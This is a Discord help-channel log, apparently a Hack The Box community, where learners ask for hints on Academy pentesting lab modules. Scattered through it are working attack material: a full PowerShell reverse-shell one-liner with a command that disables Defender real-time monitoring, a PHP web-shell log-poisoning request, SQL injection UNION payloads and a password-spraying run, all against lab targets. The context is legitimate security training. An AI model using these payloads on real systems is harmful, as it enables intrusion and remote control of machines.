Im still stuck on hacking wordpress module login.. so far i tried curl -X POST -d "<methodCall><methodName>system.listMethods</methodName><params><param><value><string>methodcall</string></value></param></params></methodCall>" http://46.101.14.23:30931/xmlrpc.php

#

and i got better results i think but im sure sure what a method call is

#

curl -X POST -d "{search:"system.listMethods"}" -H "Content-Type:application/json" http://46.101.14.23:30931/xmlrpc.php
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<fault>
<value>
<struct>
<member>
<name>faultCode</name>
<value><int>-32700</int></value>
</member>
<member>
<name>faultString</name>
<value><string>parse error. not well formed</string></value>
</member>
</struct>
</value>
</fault>
</methodResponse>

#

url -X POST -d "<methodCall><methodName>system.listMethods</methodName><params><param><value><string>methodcall</string></value></param></params></methodCall>" http://46.101.14.23:30931/xmlrpc.php

fallow delta
#

anyone free for a nudge on the AD LDAP module? Stuck on finding members of the Pentest OU in the Enumerating Active Directory with Built-in Tools section

ruby elbow
#

Hi Everyone, how you doing? In the final assesment of SQLMAP ESSENTIALS, I retrieve the table final_flag, but it content seems wrong, any help? Thanks in advance!!

shut juniper
waxen barn
shut juniper
waxen barn
versed crypt
#

Hackthebox discord server is full of offsec fans and their employees who trying to bring Oscp everytime and come up with some try harder lol

#

I understand Life is hard and you have to try harder but 3 years of study and failed 5 times plus my friends also failed many times it makes me think

#

I mean people who working as a pentester in 2022-2021-2020-2019 could not pass oscp

#

In multiple tries

charred pawn
#

help with my curl questions? 😮

#

attacking wordpress login list the all the possible method calls

versed crypt
#

What's your question

charred pawn
#

oops

#

i need to find all the number of possible method calls

#

how do i grep it and list the method call mnumber?

versed crypt
#

Make a python script lol

charred pawn
#

;-;

#

im still learn python

versed crypt
#

Import os os.system("curl etc...")

charred pawn
#

whats that do? 😮

#

😄

versed crypt
#

Amog_Flush dunno

#

archthink you need to have at least one scripting lang good

#

Because you can automate many things faster

#

Sed grep awk those things are also important

versed crypt
#

I prefer Ceh or some other companies instead of offsec

charred pawn
#

i agree i plan going back into that my odd getting me wanting to finish the hacking wordpress so my blue bar is all the way

versed crypt
#

Are u Doing htb modules?

charred pawn
#

academy ones yes

versed crypt
#

Allright, best of luck I can always be here to help (not always but always answers questions not on the server tho :()

charred pawn
#

.<

wheat garden
lucid furnace
#

Did anyone solve this :Repeat what you learned in this section to get a list of documents of the first 20 user uid's in /documents.php, one of which should have a '.txt' file with the flag.

wheat garden
lucid furnace
#

@wheat garden

#

it try to find txt in each uid's webiste,but i cant

vital adder
trail obsidian
#

Hey anyone around did the File Upload - Whitelist? I've managed to upload files passed the filter but I can't seem to access the files in the directory, ||the files have a \ or //||. :C

vital adder
#

the uploaded directory for that is the same as other section in ||/profile_images/||

trail obsidian
#

It 404s whenever I try

#

Am I doing something wrong?

vital adder
#

this module show you can bypass filter with just putting weird character in the payload name but i didn't have to do any of that and so far i have only see issue with that method

#

so that's the issue maybe?

trail obsidian
#

Hmm lemme try the other method then

#

Worked. Thanks @vital adder

wide river
#

Module name: Shells&Payloads

Section name: Reverse Shell

Question: Connect to the target via RDP and establish a reverse shell session with your attack box then submit the hostname of the target box.

#Problem: The module gave me

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

and

PS C:\Users\htb-student> Set-MpPreference -DisableRealtimeMonitoring $true

But none of these code really work, i wonder what i do wrong

lucid furnace
#

@wheat garden i think that have some problems

vital adder
#

that link redirect to some google pay stuff on any run so a bit sussy for sure

#

hi guy i need some help with Active Directory LDAP - Skills question 6 (last question of the module) i can't find that target machine FQDN any where even with bloodhound or powerview never mind i'm F ing stupid

summer lava
#

Attacking Common Services - Easy Please any hint.. i have tried but couldn't find any user credentials

proper pagoda
#

[Shells & Payloads - The Live Engagement]
Hey Guys! Had anybody trouble after connecting to the foothold machine, interacting with the target machines?
Regarding academy's task 172.16.1.0/23 network would be the target, but looking at ifconfig there is a docker route to 172.17.1.0
The alleged target IP addresses 172.16.1.11, and 172.16.1.13 are both unreachable.
Command "route" hanging when called.
Any idea what's happening?

vital adder
unreal patio
#

So far I've only found an exploit for 10.0 on vulnhub and it's paid

#

Am I supposed to attack another service than the module explains?

vital adder
unreal patio
#

@vital adder

vital adder
#

nice

summer lava
vital adder
#

when using hydra did you use the full ||mail address|| as the username?

summer lava
vital adder
#

oh sorry i miss read your first message my brain frieded after the Active Directory LDAP - Skill Assessment also yep you are using the right and did you use the given users.list

#

also you can pretty much the example command for that tool in the ||SMTP|| section

thorny glade
#

Hi,

What are your thoughts on sharing badges on your LinkedIN?

So far my LinkedIn is dusty and empty because I have nothing to brag (certs, etc) about yet.

Thanks!

#

By brag I mean show something to employers

unique valve
thorny glade
unique valve
unreal patio
#

I'm trying to install crackmapexec on a pwn box and I get

#

And when I run pip install -r requirements.txt it also bugs out

autumn pilot
#

crackmapexec is already installed on the pwnbox, simply run it with cme

rustic sage
#

Hey can I get help on the file transfers module section Windows File Transfer Methods ? I'm a not sure to understand the question correctly Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer.

#

If anyone can dm me it would be appreciated

median anvil
#

Hi, I'm stuck on the assemsent skill in Intro to Assembly. Has anyone solved it? :))

simple zephyr
#

Help with Internal Password Spraying - from Windows

Evil-WinRM PS C:\tools> Import-Module .\DomainPasswordSpray.ps1
Evil-WinRM PS C:\tools> Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue
[] Now creating a list of users to spray...
[
] There appears to be no lockout policy.
[] Removing disabled users from list.
[
] There are 2940 total users found.
[] Removing users within 1 attempt of locking out from list.
[
] Created a userlist containing 0 users gathered from the current user's domain
[] The domain password policy observation window is set to minutes.
[
] Setting a minute wait in between sprays.

it just gets stuck here and freezes. It also does not generate a userlist. I could go in an make my own list from my last password spray i did with Kerbrute, but I am trying to get this to work the way it shows in the example.

tight mesa
#

I'm working through getting started module- privilege escalation and I have to connect to the root user. I already connected to user2 and copied the ssh key over to id_rsa file. When I try to ssh the root user, I get the message "Load key "id_rsa": invalid format", and a request for a password. My input looks like "ssh root@138.68.166.182 -p 32693 -i id_rsa". Why is the ssh key not recognizing? What am I doing wrong here?

#

i also did chmod 600 on the file

glad orbit
#

Someone can help me about ATTACKING ENTERPRISE NETWORKS - Post-Exploitation.
I run the dc_shell.exe but I there isn't incoming connection. I don't undestand:
I make 1 session with the first passage, I get the root on getuid.
I make a bg sessions and in the second session I make the step with set lhost 0.0.0.0.
But don't work.

unique valve
tight mesa
autumn garnet
#

Any someone give me a bit of hand with "attacking common services sql section" I got the hash but I can't find a password list that can crack it, I've tried the ones in the resources and rock you and all the ones in seclist/passwords/ but none in the sub directory from there. Am I on the right path or am I wasting my time?

placid quest
#

@autumn garnet use rockyou.txt

unique valve
autumn garnet
#

@placid quest I tried that and it came up exhausted

lament tartan
#

this shows up on every page for me now on academy, is that intended? I downloaded a new VPN file but it doesnt go away

rustic sage
#

Hi, everytime I connect via SSH to the target disposed to Section "Bind Shells" on "Shells and Payloads" for the exercies, the connection drops. I already changed my VPN file and it doesnt fix it. Suggestions?

lament tartan
rustic sage
solar granite
lament tartan
solar granite
#

<@&861185840277487616>

little whaleBOT
#

mrok (832963964970598430) has been banned until 2022-11-23 15:51:36 (UTC).

surreal rain
#

beat me to it

winged hedge
surreal rain
#

i did -_-

mossy solstice
#

we know mto is chad

winged hedge
rustic sage
rapid sparrow
#

I want to ask

#

why the HTB machine accept http://165.227.224.62:32306/search.php?port_code=cn' UNION select 1,2,3,4-- - as url

#

But my Virtual machine/ Windows cannot run this url parameter

rapid sparrow
#

Has anyone find why the url encoding cannot be disable

sand marten
#

Hello All ! Anyone did the IDOR exercise from the web attacks module lately? The application never sets a uid parameter in the url and if I set manually, the links to the files are removed from the response

solar granite
silver iris
#

Hey guys, i have a question about "Skills Assessment - Using Web Proxies". I´m not sure if i understand question 3 right. Do i fuzz the request for the login page, with the decoded cookie and fuzz the last character (and then encode the whole cookie)? Or do i understand it incorrectly?

feral stump
lament tartan
remote crag
#

if i have a question about one machine, it's the best place for help?

remote crag
#

HTB

balmy radish
remote crag
#

ok thanks 😉

balmy radish
#

Unless there is a channel for that specific machine, then use that one

rustic sage
#

hello

unreal patio
waxen barn
pastel ginkgo
#

Is there a way to run a metasploit module on a ssh session?

unreal patio
#

You should be able of setting up a metasploit listener and then sending a shell to it

#

I havent tried that myself yet though

rustic sage
#

Is there a way to drag and drop files on the pwnbox ? It doesnt seem to work for me

pastel ginkgo
lament tartan
#

sessions

pastel ginkgo
#

it doesn't like the session command

lament tartan
#

hang on gonna test now as well

pastel ginkgo
#

fail I needed an s

#

was typing session

pastel ginkgo
placid quest
#

@lament tartan how do u change the color of the terminal

lament tartan
#

i have a "default" profile so i can quickly swap between them as some script outputs are colour coded (e.g. linpeas)

shut juniper
worldly atlas
placid quest
#

@lament tartan thanks 😊

lament tartan
worldly atlas
#

specifically assmebly code*

rustic sage
#

What do i learn before HTB

unique valve
# rustic sage What do i learn before HTB

Just start with fundamental and easy level HTB content. As you discover your learning gaps start looking into IT fundamentals. Also feel free to ask questions in this channel as they arise.

unique valve
rustic sage
#

Maybe my last one for today, i also started python, should i do hackthebox and python together or only 1 thing

unique valve
#

Hack The Box Academy actually has a python course. So you can learn both together within the context of security.

rustic sage
unique valve
rustic sage
#

I'll start tomorrow i dont have any time atm

#

Thanks for helpijg

#

Helping*

unique valve
unique valve
noble sand
#

Hey everyone, can someone help me on Assembly's assessment (task 1) ?

rustic sage
#

hello

#

i need help

foggy light
#

how to print environment variables?

#

i have tried env and printenv

foggy light
#

Use what you learned in this section to obtain the flag which is hidden in the environment variables. Answer format: HTB{String}

#

This is from SSTI

#

I got RCE but I cant find the flag

unreal patio
#

@foggy light Do you get output from env and printenv?

foggy light
#

yea

unreal patio
#

you can always give 'env | grep HTB' a shot

foggy light
#

|| cat /usr/bin/printenv | grep HTB{ ||

#

this ?

unreal patio
#

Just as I wrote it

foggy light
#

bruhhh

#

thanks

unreal patio
#

🙂

foggy light
#

I have a question

#

when i just typed env it didnt showed anything?

#

why is that?

unreal patio
#

Just typing env should give you tons of info

foggy light
#

just this...

unreal patio
#

😬

foggy light
#

it is bugged ? or i should have tried something else

unreal patio
#

if you type '/usr/bin/env'

#

Does it also return almost empty?

foggy light
#

yep same

unreal patio
#

Maybe someone else can tell you why 😓

foggy light
broken warren
#

Is anyone python savvy? Im trying to figure what "fline" means. It's specifically found in the basic brute force python script in broken auth module

hazy grotto
#

LOL i wish i would have known this a long time ago

worldly atlas
#

This is just a general question what is better Kali Linux or Parrot OS

hidden trellis
#

Module Name: SQLMap Essentials

Section Name: Attack Tuning

Question 1: “What’s the contents of table flag5?”

Issue: The flag5 that is dumped from the table is incorrect as displayed and is not accepted when submitted.

Can someone help with this?

Sorted.... a '{' became a 'b'

hazy grotto
#

Why isn't metasploit using the wordfile? All i get is this

#

these are my option settings. This isn't the wordfile i want to use but i wanted to try another one to see if that work. It worked once and about 20 entries it stopped and would never work again.

broken saffron
#

Someone is doing File Inclusion - Log Poisoning section?

flat heart
#

How do I verify myself?

broken saffron
#

GET /index.php?language=/var/log/apache2/access.log%26cmd%3dpwd HTTP/1.1
Host: 178.62.99.223:32638
User-Agent: <?php system($_GET["cmd"]);?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=apm772lhdg911hgjdg2cgo5rj4
Upgrade-Insecure-Requests: 1
Sec-GPC:

#

I just tried to read cmd=pwd but I recieved 500 error code but If I tried to see Apache Log poisoning I was able to see on burpsuite 😕

golden wagon
#

what about using valid parameter first before directory traverse? such as language=en?/../../../../../var/log/somelogblahblah

#

If it can be poisoned, then if the ssh is enable, try to poison via ssh such as ssh '<?php system($_GET[cmd]);?>'@x.x.x.x and then try language=....&cmd=somecommandblahblah again.

sturdy igloo
#

can anyone help on Advanced Command Obfuscation question of Command Injection Module?

wind acorn
#

how do i connect to the vpn in my terminul

#

what line do i run

#

im trying to serf the web and its not working

twin nest
#

hello hacks!

calm hatch
#

is there a channel to ask for help on box

autumn pilot
mellow sparrow
#

I’m a total noob so pls go easy. Also lemme know if there’s a more appropriate place to ask this. I’m trying to find open ports on my live boot of parrot connected to my home wifi with google open and a video playing on another website. I did nmap -sV -sC -p- [ip address here] and it says all ports are closed. How is this possible with google open and a video playing? Or what am I doing wrong?

spring tundra
unreal patio
placid quest
#

@mellow sparrow ports maybe closed or are due to firewall in the place that is blocking the scanning

mellow sparrow
mellow sparrow
unreal patio
north ermine
#

Hi everyone !
I am currently working on Active Directory Enumeration & Attacks
During all the exercices I have issues RDP into the hosts.
When I don't have an auth error, xfreerdp is stuck on a blackscreen.

What troubles me, is that non of those issues appear when using the attack box.

Does someone faced the same issues ?

solar granite
# lament tartan

Weird question but how do you get that msf prompt and colours? Mine is just msf6 MODULE >
I tried looking online but haven't found any official sources on how the metasploit prompt works

lament tartan
#

note that my colours aren't very practical, i chose purely because i like the appearance but quite often swap to default profile for more useful colours where tool output requires

solar granite
#

Also I found out there's options if you have no module, could you show me yours?

lament tartan
#

looks like you're on kali? i'm using parrot so different terminal i guess

#

if i change to default colour profile it looks like this:

#

instead of this

spare condor
#

Can I DM someone regarding the File Upload Attacks /Whitelist Filters?

solar granite
#

I'll look more into the msf prompt settings, I'll let you know if I find the colour settings

spare condor
#

@solar granite I have the same issue as mdolores here. I tried some extensions that worked (file successfully uploaded) but get the Not Found error:

solar granite
unreal patio
#

Paddon with the parrot pfp but no parrot os

#

smh

solar granite
#

@lament tartan I found out how to set colours for the msf prompt: set PROMPT %red%A %yel%B %grn%C %blu%D. There's also white with %whi%

solar granite
unreal patio
#

😛

solar zodiac
#

hi everyone 😄

#

Im working on the Attacking Common Services SMB Section. I think I have the right password list... but im not sure. CME isnt showing any hits, SMB_Login msf module is returning an error about encryption, and hydra is giving an error when trying smbv2. kinda lost here lol any help would be greatly appreciated

placid quest
#

@solar zodiac use xhydra maybe

solar zodiac
#

I've never tried xhydra. I'm doing something wrong here 😦 Im getting an error about encryption. Is there anyone I can dm :D?

tender jasper
#

any one facing this issue in htb academy module linux fundamentals

placid quest
#

@tender jasper use -k

tender jasper
placid quest
#

@tender jasper certificate

tender jasper
#

what certificate @placid quest

placid quest
#

@tender jasper because it is https

tender jasper
#

do i need to add anything @placid quest

placid quest
#

No just -k yo ignore certificate

tender jasper
#

i think this host is not working in htb academy @placid quest

placid quest
#

Ok

sturdy igloo
#

Need help with Command Injection Skills Assessment. I keep getting Malicious request denied.

solar granite
cinder osprey
#

what am I doing wrong

#

I have active vpn

spring tundra
#

try \\\\<ip>\\

#

or //<ip>/

#

also check if the host is reachable

sturdy igloo
cinder osprey
#

ok disabled firewall

#

lmao

solar granite
sturdy igloo
rustic sage
#

which kali should i download

north ermine
#

It seems that the hosts have some issues with gfx

limber ledge
#

What is the name of one of the accessible SMB shares from the authenticated Windows scan? (One word).. how do i get to the authenticated report

fluid yoke
#

Hi, im new at this . Can someone help me?

onyx rapids
#

What software do people use for creating the HTB Bug Bounty Hunter certification report?

bleak reef
#

quit

iron basin
#

Anyone mind providing some guidance on the module Linux Privilege Escalation - Privileged Groups? I understand I am suppose to grep the directory /var/log as the user secaudit since this user is apart of the adm group. However, I am wondering how to impersonate/escalate to this user. I see the steps used to abuse LXD container functionality to get escalation. Any help or advice is appreciated.

shy warren
#

Hey guys,

I’m stuck on Password Attacks - Password Reuse / Default Passwords - "Use the user’s credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer.

My question is, are we suppose to SSH into sam’s host and dig around for credentials? I’ve tried searching into config files, ssh keys, etc, but am getting permission errors.

Or are we suppose to use credential stuffing ( hydra -C <user_pass.list> ://) using a file with user:pass as explained in the module ? I created a file with sam, kira, will and default sql usernames. So for every line in the file I have sam:pass. kira:pass, root:pass. admin:pass etc. (pass being Sam’s password discovered in previous module) I mutated this list using rules and then tried to use Hydra with no success. Am I completely missing the ball on this one? Any guidance is appreciated.

unreal patio
#

@shy warren Just check the default password cheat list

vital adder
shy warren
#

completely fumbled the ball on this one... Thanks yall!

vital adder
vital adder
vital adder
gaunt linden
#

I am having trouble with the pivoting module. Specifically I am trying to set up a socks proxy through meterpreter and also being able to use proxychains and see a network within a network. Any help?

vital adder
#

so are you having issue setting that up?

bright ridge
#

is it possible to download the iso that hackthebox is using on the virtual servers?

vital adder
#

the pwnbox?

bright ridge
#

correct

unreal patio
iron basin
#

@vital adder I realized now why when I first did that, it didn't work. I ssh'ed in as htb-student user and not as secaudit user.

bright ridge
#

@vital adder is it possible?

iron basin
#

Thank you for your help!

vital adder
#

@bright ridge the pwnbox is basically just a custom htb them version of parrot os, check the github pin message in #710108839063846964 i that show you how to "install pwnbox" on your parrot os

unreal patio
unreal patio
#

There is no official version

#

So you have to google around for scripts that give you the 'look and feel' of a pwnbox

bright ridge
#

i see thanks

vital adder
#

for the last machine it don't have the firewall on so you can still ping it but a ping sweep only work half of the time for me for some reason so i recommend a gui tool call netwatcher

sly grotto
#

Hey. Did you solve it?

fluid yoke
#

no one help nice comunity

vital adder
#

it would be easier for us to help if you say what's your issue is

unreal patio
#

@fluid yoke Try starting with a more concise question..

#

If you're looking for a place to start head over to the academy and sort the modules on Fundamental // Tier 0

elfin nacelle
#

Do you guys think its a good idea for a 15 year old to enroll in HTB's penetration testing cert & course

placid quest
#

@elfin nacelle do u have experience before u do pentestration testing cert

vital adder
elfin nacelle
vital adder
#

unfortunately not a lot but it will help (but burp will)

elfin nacelle
vital adder
#

if you are a complete beginner i recommend tryhackme

#

it's more beginner friendly

elfin nacelle
vital adder
#

to cyber security in general

#

oh wait you are in tryhackme

elfin nacelle
vital adder
#

yep do both

elfin nacelle
#

Can't even afford the student discount

vital adder
#

tryhackme subscription is 2 dollars more expensive but you will get access to all 500 room and the unlimited attack box (thm pwnbox)

unreal patio
#

@elfin nacelle If you're new to linux you could always look at the overthewire challenges

#

But they might be too easy if you've done some previous stuff

vital adder
#

oh yeah forgot the ping but this is for you if you are looking for the last target #modules message

#

oh

#

hint ||the flag is on the share drive||

sour vapor
#

Hi! Could anybody help me with xss session hijacking? i've completed everything else in the module, but i just don't know which payload should be used to verify the place for the vulnerable input

vital adder
#

wait what auth? if you are on the domain controller you are just get the flag in the ||share drive|| without any cred

#

oh then that's not the last machine ohh you are having issue finding the cred for DC sorry i'm dumb

#

yep

#

so did you get the user (named start with an v) with mimikatz?

#

if so then the cred for that user in somewhere in the bottom of the dump

#

if you output it into a file it's way more easier to get the password

#

also hint the ||password is in clear text||

#

yep i think that's what you you supposed to do

fair mesa
#

Hello I need help on section Passwords Attack Lab -Easy of Password Attacks module, I put a lot of time in this one and I still can't manage to pass.

So there are 2 ports open on this machine which are SSH 22 and FTP 21 and
I tried to force FTP protocol with the mutated password list I crafted and username list provided in resources and I waited 1 hour it doesn't find.
I tried a lot of combination (surely not enough), I also tried to list words of 6 characters in inlanefreight.com website and make a password list with it (even mutated).

I appreciate your help thanks !

vital adder
vital adder
#

and also i think you are on the right path but not the ||right wordlist||

#

i just download the new one and it doesn't matter

fair mesa
#

Thank you MRtom ! I will try with your hints, good luck on your steps as well

vital adder
#

oh i finish this module a while back

fair mesa
#

I use the password attack wordlist given in the module

vital adder
#

yep that's the one

fair mesa
#

Ok so i'm trying hydra on FTP without any mutated password

vital adder
#

i think they update the wordlist some time ago (they just change some stuff in it)

fair mesa
#

Yes !! and it seems like they added sections Pass the hash on this module while i was working on it, or i'm blind haha

#

Very good module though but I am not proud to have spend 3 weeks on it

vital adder
#

oh that's a bit rough but everyone learns at their own pace

fair mesa
vital adder
#

no idea how tf did i forgot i have that dump file somewhere in my note but if you still have no luch with that i'll recommend re-check the output you should be able to find the cred in there or if you want to have a sanity check on mimikatz stuff shoot me a dm with your mimikatz command

twin gulch
#

Any who can help me at passwords attack module ?

fair mesa
vital adder
vital adder
#

and here is no "the best tool"

spring tundra
brazen apex
#

There are a lot of identical tools

#

sure but can I get your 2 cents @spring tundra

vital adder
#

if you are looking in general thing like port scanning then there is a best thing for that it's nmap

brazen apex
#

Yeah but why would you port scan in the first place most of my friends who tackle actual domains skip that because its not worth alerting any SOC team

vital adder
#

that is different from something like a black box attack and most ctf is like a black box attack

vital adder
jagged arrow
#

Hi! currently working on windows privilege escalation skill assessment part I. I have reverse shell exploiting a web service but really struggling with privesc (tried potatoes and spoofers and a couple others but I am starting to things I am going off on the wrong direction). Anyone I could talk to ? 🙂

graceful mortar
#

someone can help me with this question in windows privilege escalation module : Escalate privileges on the target host using the techniques demonstrated in this section. Submit the contents of the flag in the WeakPerms folder on the Administrator Desktop.

twin gulch
#

Guys. At passwords attacks section passwd - I can’t edit the passwd file, can’t open the shadow or opasswd file. Tried to remove the x from passwd and save to login without password but with no success since I still don’t have root access. I neither can Scp the files out to crack the hashes. Any clue?

pastel ginkgo
hidden trellis
#

can any one help with CROSS-SITE SCRIPTING (XSS) :Phishing: having issues removing the image url element on the page?

waxen barn
#

The last question for the DNS portion of the Footprinting module is driving me insane. I've used the smallest wordlist and I've used dnsenum on every combination of FQDN and IP address. Anyone got some advice to help on this?

forest tapir
#

Footprinting - Medium Lab

Not sure why i'm getting an error logging in to MSSQL with DEFAULT MSSQL-User:password:

#

I'm not familiar with Windows but here's the error. Maybe it's not a password problem, maybe i'm just stupid:

Login failed for user '<DEFAULT MSSQL USER>'

I found the file literally with the credentials DEFAULT MSSQL-User:password. I don't get it.

rough thunder
#

Can anyone help with linux priv esc?

#

specifically this question " Use the privileged group rights of the secaudit user to locate a flag. "

forest tapir
rough thunder
#

privileged groups

forest tapir
#

I don't know where that is... link please

#

or be more specific

rough thunder
#

Thats the direct link to the module

forest tapir
#

ahh, it's an lxc/lxd escape

rough thunder
#

I tried to follow along with the learning material but at the first step i couldn't even unzip the alpine file

forest tapir
#

I can't tell you how to use tar/zip. That's something you'll have to look up

#

Are your sure it's not a tar file?

#

"zip" and "tar" are slightly different.

rough thunder
#

its .zip

#

I now realise I might be looking in the wrong spot

#

I am part of the 'adm' group

forest tapir
#

Are you on the machine??

rough thunder
#

yes

forest tapir
#

DM me

#

bump... firGlam

#

Edit: I am still very confused with this thingie. Unless it's a red-herring, i have no fucking clue what's wrong... I'm looking right at the password firEyes It's right in front of me.. it's not changed

#

Am I missing something really obvious?? I am not familiar with Windows bullshit.

thorny wadi
#

hello :D, Im hardcore stuck on Firewall and IDS/IPS Evasion - Medium Lab, anyone that can shed some light for me in this ?

thorny wadi
#

can i pm u ?

forest tapir
#

sure

forest tapir
#

😄

#

trickity-try, i want to die

forest tapir
#

that's better

tepid thicket
forest tapir
#

Unless it works for "Administrator" but I don't see why that would make a difference. I'm trying to access MSSQL.

#

I have tried with SERVICE-NAME/Administrator but to no avail.

forest tapir
#

sure

languid ginkgo
#

Hello all,
Anyone can help me on 'Broken Authentication'->'Predictable Reset Token' ?
I have change the timezone, add the htbadmin user before the time*1000
Have I forget a thing ?

warm turret
#

@languid ginkgo First get the exact time when your tpken was generated, included the miliseconde and from then bruteforce the token increasing the miliseconds by 1 every time EX: your time*1000 + 1 etc ..

languid ginkgo
echo zenith
#

Reverse Shell & Payloads - The live engagement.
I have got the shell on Host-3 but I am not able to see the flag.txt file. It is in the Administrator user and I think I have to change the password
, but I am not able to do it. I have used “net user Administrator password” but it gives me access denied. Any ideas please?
I have also tried with net user DefaultAccount password, and it doesn’t work either. something escapes me 🤨

zenith schooner
#

Hi, aanybody working on footprinting module (SMB)? I have problems with this question "What is the full system path of that specific share?". I expected rpcclient works or enum4linux reveals something but I receive an error (NT_STATUS_NOTFOUND). So, if anybody can give a nudge. I appreciate. Thank you

placid quest
#

@zenith schooner what is the problem

zenith schooner
# placid quest <@682980233657319463> what is the problem

the problem is I expected to use rpcclient -U ¨¨ <ip> to retrieve that information but receive a NT_STATUS_NOTFOUND. I also try enum4linux -A <IP> and I got a lot of information but no one about physical path. So, I am not sure if I miss something or there is something wrong. It is weird because enum4linux use rpcclient calls and the looks like works.

placid quest
#

@zenith schooner read the man page of rpcclient

zenith schooner
unreal patio
#

@echo zenith just use "type C:\Users\Administrator\Desktop\Skills-flag.txt"

echo zenith
unreal patio
#

If you used Eternalblue you should be admin

echo zenith
pale stump
#

Hii

placid quest
#

@pale stump hei

slim plover
#

can someone help me with Q1 in LLMNR/NBT-NS Poisoning - from Linux section?

Started responder with default options and it has been running for 10 minutes now but didn't capture any hashes yet. Am I supposed to browse something manually to capture hashes?

placid quest
#

@slim plover which module

slim plover
gusty fulcrum
placid quest
#

@slim plover i think u need to first connect to ssh

slim plover
placid quest
#

@slim plover that may a problem

slim plover
#

I will try resetting the box I guess

pale stump
ocean night
#

No hacker, only Zuul

pale stump
#

Who Is Zuul

ocean night
#

Means I tried to make a joke, and failed

pale stump
ocean night
#

It's a reference to the original Ghost Busters film

pale stump
ocean night
#

👻

pale stump
ocean night
#

What's up?

placid quest
#

@gusty fulcrum np

ocean night
#

@pale stump - what is it you need?

pale stump
ocean night
#

I'd also appreciate it if you removed that advert from your "About Me" section on your profile @pale stump

ocean night
#

The advert, in your "About Me" section on your profile. Remove it.

pale stump
ocean night
#

Seriously?

dense ferry
#

lul

pale stump
#

Tell N

ocean night
#

Last chance..

solar granite
pale stump
#

@ocean night Does It Ok

ocean night
#

Thank you

pale stump
#

Now

autumn pilot
#

try to formulate a question

#

or google how to

placid quest
#

@solar granite That is businesses

ocean night
#

The Academy is a platform that will introduce you to Hacking, the methods, the tools, along with practical exercises.

#

Go forth, and learn!

ocean night
#

Yes, a lot of modules are free.

pale stump
#

@ocean night Okh Then I'll Try

ocean night
#

Have fun!

pale stump
#

But

#

Who Will Guide Me@ocean night